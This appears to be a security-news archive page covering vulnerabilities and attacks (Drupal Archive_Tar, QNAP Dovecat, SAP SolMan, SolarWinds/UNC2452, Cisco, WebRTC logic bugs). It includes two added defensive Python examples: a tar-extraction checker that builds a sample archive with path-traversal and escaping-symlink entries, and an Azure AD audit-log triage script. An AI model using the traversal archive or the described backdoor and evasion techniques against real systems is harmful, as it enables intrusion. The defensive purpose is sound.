Category Archives: Hacking

Drupal fixed a new flaw related to the PEAR Archive_Tar library

The Drupal development team has released security updates to address a vulnerability in the PEAR Archive_Tar third-party library.

The Drupal development team has released security updates to address the CVE-2020-36193 vulnerability in the PEAR Archive_Tar third-party library.

The PEAR Archive_Tar class provides handling of tar files in PHP. It supports creating, listing, extracting, and adding to tar files.

The developers released core patches for versions 9.1, 9.0, 8.9, and 7 of the popular CMS.

The CVE-2020-36193 flaw is caused by an improper check of symbolic links, which lets Tar.php in Archive_Tar perform write operations via directory traversal.

“The Drupal project uses the pear Archive_Tar library, which has released a security update that impacts Drupal.” reads the advisory.

The flaw could be exploited by attackers if the CMS is configured to allow for the upload and processing of .tar, .tar.gz, .bz2, or .tlz files.

The flaw affects Archive_Tar through version 1.4.11; it was fixed by disallowing symlinks that point to out-of-path filenames.

According to the advisory published by Drupal, the flaw could be mitigated by disabling uploads of .tar, .tar.gz, .bz2, or .tlz files.
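The check the advisory describes (refusing symlinks that point outside the extraction directory, so that a later entry written through the link cannot escape) is worth seeing in working form. The block below is an added example written for this page, not code from Drupal or from the Archive_Tar library; it uses Python's standard `tarfile` module rather than PHP, builds a constructed sample archive in memory, and audits each entry against a hypothetical extraction root `/srv/extract` before anything is written to disk.

```python
import io
import os
import tarfile


def _inside(base: str, relpath: str) -> bool:
    """True if base/relpath, after lexical normalisation, stays under base."""
    base = os.path.normpath(base)
    target = os.path.normpath(os.path.join(base, relpath))
    return target == base or target.startswith(base + os.sep)


def check_member(member: tarfile.TarInfo, dest: str):
    """Return None if the entry is safe to extract under dest, else the reason.

    Same class of rule as the Archive_Tar fix: an entry may not name a path
    outside dest, and a symlink or hardlink may not point outside dest, since
    a later entry written *through* such a link would otherwise escape."""
    if os.path.isabs(member.name) or not _inside(dest, member.name):
        return "entry name escapes extraction directory"
    if member.issym():
        if os.path.isabs(member.linkname):
            return "absolute symlink target"
        # A symlink target is resolved relative to the link's own directory.
        resolved = os.path.join(os.path.dirname(member.name), member.linkname)
        if not _inside(dest, resolved):
            return "symlink target escapes extraction directory"
    elif member.islnk():
        # A hardlink target is an archive-relative path.
        if os.path.isabs(member.linkname) or not _inside(dest, member.linkname):
            return "hardlink target escapes extraction directory"
    return None


def safe_members(tar: tarfile.TarFile, dest: str):
    """Entries that passed the check; pass to tar.extractall(dest, members=...)."""
    return [m for m in tar.getmembers() if check_member(m, dest) is None]


def audit(tar_bytes: bytes, dest: str) -> dict:
    """Map each rejected entry name to the reason it must not be extracted."""
    rejected = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            reason = check_member(member, dest)
            if reason is not None:
                rejected[member.name] = reason
    return rejected


def build_sample_tar() -> bytes:
    """Constructed sample archive (not taken from the advisory): a benign file,
    a symlink pointing above the extraction root, a file whose path goes
    through that link, a traversal file name, and a harmless in-tree symlink."""
    buf = io.BytesIO()
    payload = b"hello\n"
    with tarfile.open(fileobj=buf, mode="w") as tar:
        readme = tarfile.TarInfo("docs/readme.txt")
        readme.size = len(payload)
        tar.addfile(readme, io.BytesIO(payload))

        escape = tarfile.TarInfo("docs/escape")       # docs/escape -> ../../outside
        escape.type = tarfile.SYMTYPE
        escape.linkname = "../../outside"
        tar.addfile(escape)

        through = tarfile.TarInfo("docs/escape/dropped.txt")  # write through the link
        through.size = len(payload)
        tar.addfile(through, io.BytesIO(payload))

        traversal = tarfile.TarInfo("../escaped.txt")  # classic dot-dot entry name
        traversal.size = len(payload)
        tar.addfile(traversal, io.BytesIO(payload))

        alias = tarfile.TarInfo("docs/alias")          # stays inside, allowed
        alias.type = tarfile.SYMTYPE
        alias.linkname = "readme.txt"
        tar.addfile(alias)
    return buf.getvalue()


if __name__ == "__main__":
    for name, why in audit(build_sample_tar(), "/srv/extract").items():
        print(f"rejected {name}: {why}")
```

Note that `docs/escape/dropped.txt` passes the lexical check on its own; it is harmless only because the symlink it would have been written through is rejected first, which is exactly why the fix targets the link rather than the file. The check is purely lexical and runs before extraction, so it does not depend on what already exists under the destination.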

The development team recommends installing the latest version:

  • If you are using version 9.1, update to Drupal 9.1.3.
  • If you are using version 9.0, update to Drupal 9.0.11.
  • If you are using version 8.9, update to 8.9.13.
  • If you are using version 7, update to 7.78.

Versions of Drupal 8 prior to 8.9.x are end-of-life and do not receive security coverage.

The CVE-2020-36193 vulnerability is linked to the CVE-2020-28948 flaw that was fixed by the developers in November with the release of emergency security updates.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Drupal fixed a new flaw related to the PEAR Archive_Tar library appeared first on Security Affairs.

Dovecat crypto-miner is targeting QNAP NAS devices

QNAP is warning customers of a new piece of malware dubbed Dovecat that is targeting NAS devices to mine cryptocurrency.

Taiwanese vendor QNAP has published a security advisory to warn customers of a new piece of malware named Dovecat that is targeting NAS devices. The malware was designed to abuse NAS resources and mine cryptocurrency.

The malware targets QNAP NAS devices exposed online that use weak passwords.

“QNAP Systems, Inc. (QNAP), a leading computing, networking and storage solution innovator, today issued a statement in response to recent user reports that a new type of malware named dovecat is targeting QNAP NAS and installing bitcoin miners without user consent.” reads the security advisory published by the vendor.

“According to analysis, QNAP NAS can become infected when they are connected to the Internet with weak user passwords.”

Since the end of 2020, several users have reported infections ([1], [2]) on their devices: they noticed the presence of the “dedpma” and “dovecat” processes, which were causing a high processor load and saturating the RAM of the NAS.

In November, the vendor published a post warning its customers that NAS devices with the dovecat and dedpma processes running were infected with a Bitcoin cryptocurrency miner.

“If such processes are running on recent FW (4.4.x), it means the system has been compromised and is running a Bitcoin miner.” states the post published by QNAP.

“In the meantime, please update the NAS firmware and Malware Remover in the App Center to the latest version if not done already to ensure the latest security patches are applied on the NAS.”

According to the experts, the same Bitcoin malware also infected Synology NAS devices.

QNAP recommends that users take the following measures to prevent these infections:

  • Update QTS to the latest version.
  • Install the latest version of Malware Remover.
  • Install Security Counselor and run with Intermediate Security Policy (or above).
  • Install a firewall.
  • Enable Network Access Protection to protect accounts from brute force attacks.
  • Use stronger admin passwords.
  • Use stronger passwords for database administrators.
  • Disable SSH and Telnet services if not in use.
  • Disable unused services and apps.
  • Avoid using default port numbers (80, 443, 8080, and 8081).

In December, QNAP released security updates to fix eight vulnerabilities that could be exploited by attackers to take over unpatched NAS devices.

The list of vulnerabilities addressed by QNAP is available here; it includes XSS and command injection issues. The flaws fixed by the vendor are rated as medium and high severity.

In September, while the AgeLocker ransomware was continuing to target QNAP NAS systems, the Taiwanese vendor urged customers to update the firmware and apps.

In early August, the Taiwanese company urged its users to update the Malware Remover app to prevent NAS devices from being infected by the QSnatch malware.

In June the company also warned of eCh0raix ransomware attacks that targeted its NAS devices.


Pierluigi Paganini

(SecurityAffairs – hacking, QNAP)


Passwords stolen via phishing campaign available through Google search

Poor operational security by the operators of a phishing campaign exposed the credentials stolen in their attacks and made them publicly available through Google queries.

Check Point Research along with experts from cybersecurity firm Otorio shared details on their investigation into a large-scale phishing campaign that targeted thousands of global organizations.

The campaign has been active since August. The attackers used emails that masqueraded as Xerox scan notifications and urged recipients to open a malicious HTML attachment. This trick allowed the attackers to bypass Microsoft Office 365 Advanced Threat Protection (ATP) filtering and steal the credentials of over a thousand corporate employees.


The experts noticed that the operators behind the phishing campaign, which targeted the construction and energy sectors, accidentally exposed the credentials stolen in the attacks, leaving them publicly viewable with a simple Google search.

“Interestingly, due to a simple mistake in their attack chain, the attackers behind the phishing campaign exposed the credentials they had stolen to the public Internet, across dozens of drop-zone servers used by the attackers. With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses:  a gift to every opportunistic attacker.” reads the post published by Check Point.

Once the victim double-clicked the HTML file, a blurred image with a preconfigured email within the document is opened in the browser.

Upon launching the HTML file, JavaScript code is executed in the background: it gathers the password, sends the data to the attackers’ server, and redirects the user to a legitimate Office 365 login page.

Phishers used both their own infrastructure and compromised WordPress websites to store the stolen data.

“We discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named “go.php”, “post.php”, “gate.php”, “rent.php” or “rest.php”) and processed all incoming credentials from victims of the phishing attacks.” continues the post.

“Attackers usually prefer to use compromised servers instead of their own infrastructure because of the existing websites’ well-known reputations. The more widely recognized a reputation is, the chances are higher that the email will not be blocked by security vendors”

The emails were sent from a Linux server hosted on Microsoft’s Azure; they were often sent using PHP Mailer 6.1.5 and delivered through 1&1 email servers.

Attackers also sent out spam messages through compromised email accounts to make messages appear to be from legitimate sources. 

Data sent to the drop-zone servers was saved in a publicly visible file that was indexable by Google. This means that it was available to anyone with a simple Google search.

The analysis of a subset of ~500 stolen credentials revealed that victims belong to a wide range of target industries, including IT, healthcare, real estate, and manufacturing.

Check Point shared its findings with Google.

Experts noticed that the JavaScript encoding used in this campaign was the same as that used in another phishing campaign from May 2020, a circumstance that suggests the same threat actor is behind both campaigns.

The report also includes Indicators of Compromise (IoCs).


Pierluigi Paganini

(SecurityAffairs – hacking, phishing)


Experts warn of scanning activity for critical SAP SolMan flaw after the release of exploit

Experts warn of automated scanning activity for servers affected by a critical SAP SolMan flaw after the release of an exploit code.

Experts warn of automated scanning activity for servers affected by vulnerabilities in SAP software: attackers started probing systems after the release of an exploit for the critical CVE-2020-6207 flaw in SAP Solution Manager (SolMan), version 7.2.

“SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.” reads the advisory.

SAP Solution Manager is a product developed by the software company SAP SE. It offers end-to-end application lifecycle management to streamline business processes and proactively address improvement options, increasing efficiency and decreasing risk within SAP customers’ existing maintenance agreements while managing the application lifecycle.

The vulnerability resides in the EEM Manager component and is caused by a missing authentication check; it has been rated as critical and received a CVSS base score of 10.0.

A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance.

“While exploits are released regularly online, this hasn’t been the case for SAP vulnerabilities, for which publicly available exploits have been limited.” reads a post published by Onapsis. “The release of a public exploit significantly increases the chance of an attack attempt since it also expands potential attackers not only to SAP-experts or professionals, but also to script-kiddies or less-experienced attackers that can now leverage public tools instead of creating their own.”

SolMan centralizes the management of all SAP and non-SAP systems within an SAP landscape. It performs multiple actions, including implementation, support, monitoring and maintenance of all enterprise mission-critical SAP applications, including ERP, CRM, HCM, SCM, BI, financials and others. If an attacker is able to gain access to SolMan, they could compromise any system connected to it.


In early 2020, researchers from Onapsis Research Labs reported that, in default configurations, unauthenticated remote attackers could execute operating system commands on the satellite systems and achieve full privileges on the associated SAP systems. SAP addressed the flaw in March 2020 (SAP Security note #2890213), so SAP customers who have proper patching in place shouldn’t be affected by this exploit.

A remote unauthenticated attacker could exploit this flaw to execute highly privileged administrative tasks in the connected SAP SMD Agents. Every system connected to the SolMan can be potentially affected.

Below are some of the possible exploitation scenarios:

  • Shutting down any SAP system in the landscape (not only SAP SolMan) 
  • Causing IT control deficiencies impacting financial integrity and privacy leading to regulatory compliance violations such as Sarbanes-Oxley (SOX), GDPR and others 
  • Deleting any data in the SAP systems, including key data that can cause business disruption
  • Assigning superuser (e.g. SAP_ALL) privileges to any existing or new user, enabling those users to run business operations that would normally require specific privileges to bypass other Segregation of Duties (SoD) controls
  • Reading sensitive data from the database, including employee and customer personal information

Last week, Dmitry Chastuhin released a PoC exploit code for CVE-2020-6207 for educational purposes.

“This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager” read the description published on GitHub.

After the release of the exploit code, security researchers at Onapsis observed scanning activity in the wild for vulnerable systems.


Pierluigi Paganini

(SecurityAffairs – hacking, SolMan)


SVR Attacks on Microsoft 365

FireEye is reporting the current known tactics that the SVR used to compromise Microsoft 365 cloud data as part of its SolarWinds operation:

Mandiant has observed UNC2452 and other threat actors moving laterally to the Microsoft 365 cloud using a combination of four primary techniques:

  • Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  • Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  • Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  • Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

Lots of details here, including information on remediation and hardening.

The more we learn about this operation, the more sophisticated it becomes.

In related news, Malwarebytes was also targeted.

SolarWinds Attack: Microsoft sheds light on Solorigate second-stage activation

Microsoft’s report provides details of the entire SolarWinds attack chain with a deep dive in the second-stage activation of malware and tools.

Microsoft published a new report that includes additional details of the SolarWinds supply chain attack. The new analysis sheds light on the handover from the Solorigate DLL backdoor to the Cobalt Strike loader.

The attackers focused on separating these two components of the attack chain as much as possible to evade detection.

The report provides details regarding the Solorigate second-stage activation that allowed the attacker to deliver Cobalt Strike loaders, such as Teardrop, and Raindrop.

The known information on the attacks confirms that the Solorigate DLL backdoor was compiled at the end of February 2020 and distributed to the potential victims in late March. The attackers then removed the Solorigate backdoor code from SolarWinds’ build environment in June 2020.

Considering that the Solorigate backdoor was designed to stay dormant for at least two weeks, the analysis of the timeline suggests that attackers spent approximately a month selecting the victims and preparing unique Cobalt Strike implants as well as command-and-control (C2) infrastructure. This means that the “hands-on-keyboard activity” likely started as early as May.

“The removal of the backdoor-generation function and the compromised code from SolarWinds binaries in June could indicate that, by this time, the attackers had reached a sufficient number of interesting targets, and their objective shifted from deployment and activation of the backdoor (Stage 1) to being operational on selected victim networks, continuing the attack with hands-on-keyboard activity using the Cobalt Strike implants (Stage 2).” states the report published by Microsoft.

[Figure: timeline of the Solorigate attacks]

Microsoft experts analyzed forensic data across the entire environment of impacted organizations to discover how the attackers moved laterally and how long they remained within their target networks.

The experts conducted a deep analysis of data collected through Microsoft 365 Defender and Microsoft Defender telemetry.


While investigating the attack, Microsoft identified several second-stage malware and tools, including TEARDROP, Raindrop, and also other custom loaders for the Cobalt Strike beacon.

“TEARDROP, Raindrop, and the other custom Cobalt Strike Beacon loaders observed during the Solorigate investigation are likely generated using custom Artifact Kit templates.” continues the report. “Each custom loader loads either a Beacon Reflective Loader or a preliminary loader that subsequently loads the Beacon Reflective Loader. Reflective DLL loading is a technique for loading a DLL into a process memory without using the Windows loader.”

Microsoft added that additional attacker tactics, anti-forensic behavior, and operational security allowed them to avoid detection and stand out for their adherence to operations security (OpSec) best practices.

Some examples of why these attackers stand out for their professional OpSec methodology and anti-forensic behavior are listed below:

  • Methodical avoidance of shared indicators for each compromised host. Attackers prepared a unique Cobalt Strike DLL implant for each machine and avoided at any cost any overlap or reuse of folder name, file name, export function names, C2 domain/IP, HTTP requests, timestamp, file metadata, config, and child process launched.
  • Camouflage and blending into the environment. Attackers always renamed tools and binaries they used (e.g., ADFIND legit tool) and placed them in folders that mimicked existing programs and files already present on a machine.
  • Disabling event logging using AUDITPOL and re-enabling it afterward.
  • To avoid noisy network enumeration activities (such as repeated NSLOOKUP or LDAP queries) being detected, the attackers created special firewall rules to minimize outgoing packets for certain protocols. Then the attackers methodically removed the rules after the reconnaissance was completed.
  • Lateral movement activities were never executed without preparation. 
  • Attackers used timestomping to change the timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate the discovery and recovery of DLL implants from affected environments.

“As we continue to gain deeper understanding of the Solorigate attack, we get a clearer picture of the skill level of the attackers and the extent of planning they put into pulling off one of the most sophisticated attacks in recent history. The combination of a complex attack chain and a protracted operation means that defensive solutions need to have comprehensive cross-domain visibility into attacker activity and provide months of historical data with powerful hunting tools to investigate as far back as necessary.” concludes Microsoft.


Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)


Cisco fixed multiple flaws in Cisco SD-WAN products and Smart Software Manager Satellite Web UI

Cisco fixed multiple flaws in Cisco SD-WAN products that could allow an unauthenticated, remote attacker to execute attacks against its devices.

Cisco released security updates to address multiple flaws in Cisco SD-WAN products that could allow an unauthenticated, remote attacker to execute attacks against vulnerable devices.

These vulnerabilities impact devices running the following Cisco SD-WAN Software:

  • IOS XE SD-WAN Software
  • SD-WAN vBond Orchestrator Software
  • SD-WAN vEdge Cloud Routers
  • SD-WAN vEdge Routers
  • SD-WAN vManage Software
  • SD-WAN vSmart Controller Software

The first issue, tracked as CVE-2021-1300, is a Cisco SD-WAN buffer overflow vulnerability that could be exploited by an unauthenticated, remote attacker to trigger a buffer overflow condition.

“A vulnerability in Cisco SD-WAN Software could allow an unauthenticated, remote attacker to cause a buffer overflow condition.” reads the security advisory. “A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges.”

The vulnerability stems from the incorrect handling of IP traffic. An attacker can trigger the flaw by sending crafted IP traffic through an affected device, which may cause a buffer overflow when the traffic is processed. The flaw has been rated with a CVSS Base Score of 9.8.

The IT giant said that there are no workarounds that address this vulnerability.

The second flaw addressed by the company is a Cisco SD-WAN buffer overflow vulnerability tracked as CVE-2021-1301.

The flaw resides in the NETCONF subsystem; an authenticated, remote attacker could exploit the vulnerability to trigger a denial of service (DoS) condition on an affected device or system.

The vulnerability is caused by the insufficient input validation of user-supplied input that is read by the system during the establishment of an SSH connection.

“An attacker could exploit this vulnerability by submitting a crafted file to be read by the affected system. A successful exploit could allow the attacker to cause a buffer overflow that could result in a DoS condition on the affected device or system.” states the advisory.

The flaw has been rated with a CVSS Base Score of 6.5; the company said that there are no workarounds that address this vulnerability.

Cisco also addressed critical Command Injection vulnerabilities in Smart Software Manager Satellite Web UI.

The flaws, tracked as CVE-2021-1138, CVE-2021-1140, and CVE-2021-1142, affect Cisco Smart Software Manager Satellite releases 5.1.0 and earlier and have been fixed with the release of versions 6.3.0 and later.

“Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system.” reads the advisory.

The Cisco Product Security Incident Response Team (PSIRT) is not aware of public announcements or threat actors exploiting the above issues in attacks in the wild.


Pierluigi Paganini

(SecurityAffairs – hacking, Cisco)


Logic bugs found in popular apps, including Signal and FB Messenger

Flaws in popular messaging apps such as Signal and FB Messenger allowed an attacker to force a target device to transmit audio to an attacker-controlled device.

Google Project Zero security researcher Natalie Silvanovich found multiple flaws in popular video conferencing apps such as Signal and FB Messenger that allowed an attacker to force a target device to transmit audio of its surroundings to an attacker-controlled device.

The bugs are similar to a logic flaw discovered in January 2019 in Group FaceTime that allowed a caller to hear a person’s audio before they answered.

The logic flaws affect the Signal, Google Duo, Facebook Messenger, JioChat, and Mocha messaging apps; the good news is that they have already been fixed by the development teams.

“The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device.” reads the post published by Silvanovich. “While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine — an attack scenario I had never seen considered on any platform — made me wonder whether other state machines had similar vulnerabilities as well. “

Most video conferencing applications use WebRTC. Peers establish WebRTC connections by exchanging call set-up information in the Session Description Protocol (SDP), a process called signalling.

In a typical WebRTC connection, the caller starts off by sending an SDP offer to the callee, which in turn responds with an SDP answer.

These messages contain most of the information needed to transmit and receive media, including codec support, encryption keys and much more.

“Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.” continues the post.

The logic flaws also potentially allowed the caller to force a callee device to transmit audio or video data.

Silvanovich discovered that data is shared even if the receiver has not interacted with the application to answer the call.

Signal attack
  • Signal addressed the logical bug in the Android version in September 2019. “The application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings”
  • JioChat (flaw in the Android app fixed in July 2020) and Mocha (flaw in the Android app fixed in August 2020). “This design has a fundamental problem, as candidates can be optionally included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, which will in turn lead to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed by filtering SDP on the server.”
  • Facebook Messenger addressed the bug in November 2020.
  • Google Duo solved the bug in December 2020.

“The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.” concludes the expert.


Pierluigi Paganini

(SecurityAffairs – hacking, mobile apps)


Livecoin halted operations after the December attack

The Russian cryptocurrency exchange Livecoin has announced it is terminating its operation following the December cyberattack. 

The Russian cryptocurrency exchange was hacked on Christmas Eve; it published a message on its website warning customers to stop using its services.

“Dear clients, we ask you to stop using our service in all meanings: don’t deposit funds, don’t trade, don’t use API. We are under a carefully planned attack, which has been prepared, as we assume, over the last few months. We lost control of all of our servers, backend and nodes. Thus, we were not able to stop our service in time.” reads the message published on the website. “Our news channels were compromised as well. At the moment, we partially control frontend, and so we’re able to place this announcement. We’re fighting hard to get back our servers, nodes and funds, we’re working 24/7. News and next update will come up in the next few days. We’re working in contact with local police authorities. We really do our best to overcome this issue.”


Livecoin recommended that users stop depositing funds and making transactions, and it also notified local law enforcement.

The platform’s administrators told customers that they had lost control of some of their servers; the attack was not opportunistic and appears to have been well planned.

The attack took place overnight between December 23 and December 24. The attackers modified exchange rates to absurd values (15 times their ordinary values): the Bitcoin exchange rate was set to over $450,000/BTC, while the value of ETH was raised from $600/ETH to $15,000.

Once the exchange rates had been pumped, the attackers began cashing out accounts, making huge profits.

Now, Livecoin announced it is terminating its activity following the December cyberattack. 

“Dear clients, as we reported earlier, our service were under attack in December 2020. Investigation is in active phase right now. Our service has been damaged hard in technical and financial way. There is no way to continue operative business in these conditions, so we take a hard decision to close the business and paying the remaining funds to clients.” reads the announcement published by the exchange.

“Our clients have to contact us via email to get payments after passing verification procedure. We accept claims for payments for the next 2 months. 17 March 2021 is the last day of accepting your requests, after this date no new requests will be accepted.”

The company announced that it will accept claims for payments until 17 March 2021.

CoinTelegraph reported that some users have refused to send their personal data to Livecoin, fearing for their security and privacy. A user revealed that Livecoin is requesting documents and data that could be used by ill-intentioned actors to conduct scams and fraud, including passport scans, residence information, high-resolution selfies, and data about the first transaction on the exchange.

“We apologize for an existing situation and ask you to keep calm, including your conversation with support officers. Our service and team bear hard losses as well as our clients. In case of abuse and threats in conversation, the claim can be declined.” Livecoin added.

“We have to warn you about tons of fake groups in different messengers and other channels, where people represent themselves as our team members, insiders, hackers etc. Participating in these groups you run a high risk, because we have no any groups. The only official statements are made on this website. Do not send money to anyone. You don’t have to pay to get back your funds from us, the only thing you need is to send a request and follow simple procedure.”

At the time of this writing, Livecoin’s old website domain displays the message “Oops! Time is over Livecoin….”.

As usual, some users speculate that this could be an exit scam.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Livecoin)

The post Livecoin halted operations after the December attack appeared first on Security Affairs.

FireEye releases an auditing tool to detect SolarWinds hackers’ activity

Cybersecurity firm FireEye has released a report that sheds the light on the SolarWinds attack and the way hackers breached its networks.

The experts explained how UNC2452 and other threat actors breached the infrastructure and moved laterally from on-premises networks to the Microsoft 365 cloud. The paper, titled Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452, also provides tips on how organizations can proactively harden their environments.

FireEye also released a tool named Azure AD Investigator that could be used by organizations to discover if their organization has been breached by the SolarWinds hackers, tracked by the security firm as UNC2452.

The FireEye GitHub repository contains a PowerShell module that can be used to detect artifacts associated with UNC2452’s intrusion and other threat actor activity.

“Some indicators are “high-fidelity” indicators of compromise, while other artifacts are so called “dual-use” artifacts.” states FireEye. “Dual-use artifacts may be related to threat actor activity, but also may be related to legitimate functionality. Analysis and verification will be required for these.”

FireEye pointed out that the tool is read-only, which means that it does not make any changes to the Microsoft 365 environment.

The company warns that the tool cannot identify a compromise in every case and cannot by itself distinguish whether an artifact is the result of legitimate admin activity or of threat actor activity.

Mandiant researchers explained that UNC2452 and other threat actors primarily used four techniques for lateral movements:

  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.
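As an added example, not part of the FireEye tool or of the original article, the following Python triages an exported Azure AD audit log for the four patterns listed above: federation changes are treated as high-fidelity indicators, while service principal credential additions and privileged role assignments are reported as dual-use artifacts that need analyst review. The records are constructed; the activityDisplayName strings and the modifiedProperties layout are assumptions that should be checked against a real export.

```python
import json
from dataclasses import dataclass

# Operation names as they appear in the activityDisplayName field of Azure AD
# audit logs. Assumption for this example: confirm them against your own export.
HIGH_FIDELITY = {
    "Set federation settings on domain": "federated IdP added or changed (Azure AD backdoor pattern)",
    "Set domain authentication": "domain switched between managed and federated",
}
DUAL_USE = {
    "Add service principal credentials": "credential added to a service principal (legitimate or app backdoor)",
    "Update application – Certificates and secrets management": "application credential changed",
    "Add member to role": "privileged directory role assignment",
}
PRIVILEGED_ROLES = {"Global Administrator", "Application Administrator"}


@dataclass
class Finding:
    when: str
    actor: str
    operation: str
    target: str
    fidelity: str   # "high" needs response; "dual-use" needs analyst verification
    note: str


def _actor(rec):
    who = rec.get("initiatedBy", {})
    return ((who.get("user") or {}).get("userPrincipalName")
            or (who.get("app") or {}).get("displayName") or "unknown")


def _target(rec):
    tr = (rec.get("targetResources") or [{}])[0]
    return tr.get("userPrincipalName") or tr.get("displayName") or ""


def _role(rec):
    # Assumed layout: the role name is in modifiedProperties as a JSON-encoded string.
    for tr in rec.get("targetResources", []):
        for prop in tr.get("modifiedProperties", []):
            if prop.get("displayName") == "Role.DisplayName":
                raw = prop.get("newValue", "")
                try:
                    return json.loads(raw)
                except ValueError:
                    return raw
    return ""


def review_audit_log(records):
    """Return the records worth a look, labelled by how much they prove on their own."""
    findings = []
    for rec in records:
        op = rec.get("activityDisplayName", "")
        if op in HIGH_FIDELITY:
            findings.append(Finding(rec["activityDateTime"], _actor(rec), op,
                                    _target(rec), "high", HIGH_FIDELITY[op]))
        elif op in DUAL_USE:
            note = DUAL_USE[op]
            if op == "Add member to role":
                role = _role(rec)
                if role not in PRIVILEGED_ROLES:
                    continue            # ordinary role changes are noise here
                note = f"{role} granted"
            findings.append(Finding(rec["activityDateTime"], _actor(rec), op,
                                    _target(rec), "dual-use", note))
    return findings


# Constructed sample export (not real tenant data).
SAMPLE_LOG = r"""[
 {"activityDateTime": "2020-12-10T08:12:01Z", "activityDisplayName": "Set federation settings on domain",
  "initiatedBy": {"user": {"userPrincipalName": "svc-sync@contoso.example"}},
  "targetResources": [{"displayName": "contoso.example"}]},
 {"activityDateTime": "2020-12-10T08:20:44Z", "activityDisplayName": "Add service principal credentials",
  "initiatedBy": {"user": {"userPrincipalName": "svc-sync@contoso.example"}},
  "targetResources": [{"displayName": "Mail Archiver"}]},
 {"activityDateTime": "2020-12-10T09:01:15Z", "activityDisplayName": "Add member to role",
  "initiatedBy": {"user": {"userPrincipalName": "admin@contoso.example"}},
  "targetResources": [{"userPrincipalName": "alice@contoso.example",
    "modifiedProperties": [{"displayName": "Role.DisplayName", "newValue": "\"Reports Reader\""}]}]},
 {"activityDateTime": "2020-12-11T17:45:09Z", "activityDisplayName": "Add member to role",
  "initiatedBy": {"user": {"userPrincipalName": "svc-sync@contoso.example"}},
  "targetResources": [{"userPrincipalName": "bob@contoso.example",
    "modifiedProperties": [{"displayName": "Role.DisplayName", "newValue": "\"Global Administrator\""}]}]},
 {"activityDateTime": "2020-12-11T18:00:00Z", "activityDisplayName": "Update user",
  "initiatedBy": {"user": {"userPrincipalName": "admin@contoso.example"}},
  "targetResources": [{"userPrincipalName": "carol@contoso.example"}]}
]"""


def demo():
    return review_audit_log(json.loads(SAMPLE_LOG))


if __name__ == "__main__":
    for f in demo():
        print(f"{f.when} [{f.fidelity}] {f.operation}: {f.actor} -> {f.target} ({f.note})")
```

The split between the two dictionaries mirrors FireEye's own distinction: a federation change in a tenant that does not federate is alarming on its own, whereas a new service principal credential has to be correlated with change tickets and the actor's normal behaviour before it means anything.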

The Cybersecurity and Infrastructure Security Agency (CISA)’s Cloud Forensics team has also released a PowerShell-based tool, dubbed Sparrow, that helps administrators detect anomalies and potentially malicious activities in Azure/Microsoft 365 environments.

CrowdStrike experts also decided to create their own tool because of the difficulties they faced in using Azure’s administrative tools to enumerate the privileges assigned to third-party resellers and partners in their Azure tenant.

“CrowdStrike launches CrowdStrike Reporting Tool for Azure (CRT), a free community tool that will help organizations quickly and easily review excessive permissions in their Azure AD environments, help determine configuration weaknesses, and provide advice to mitigate risk.” states the security firm.

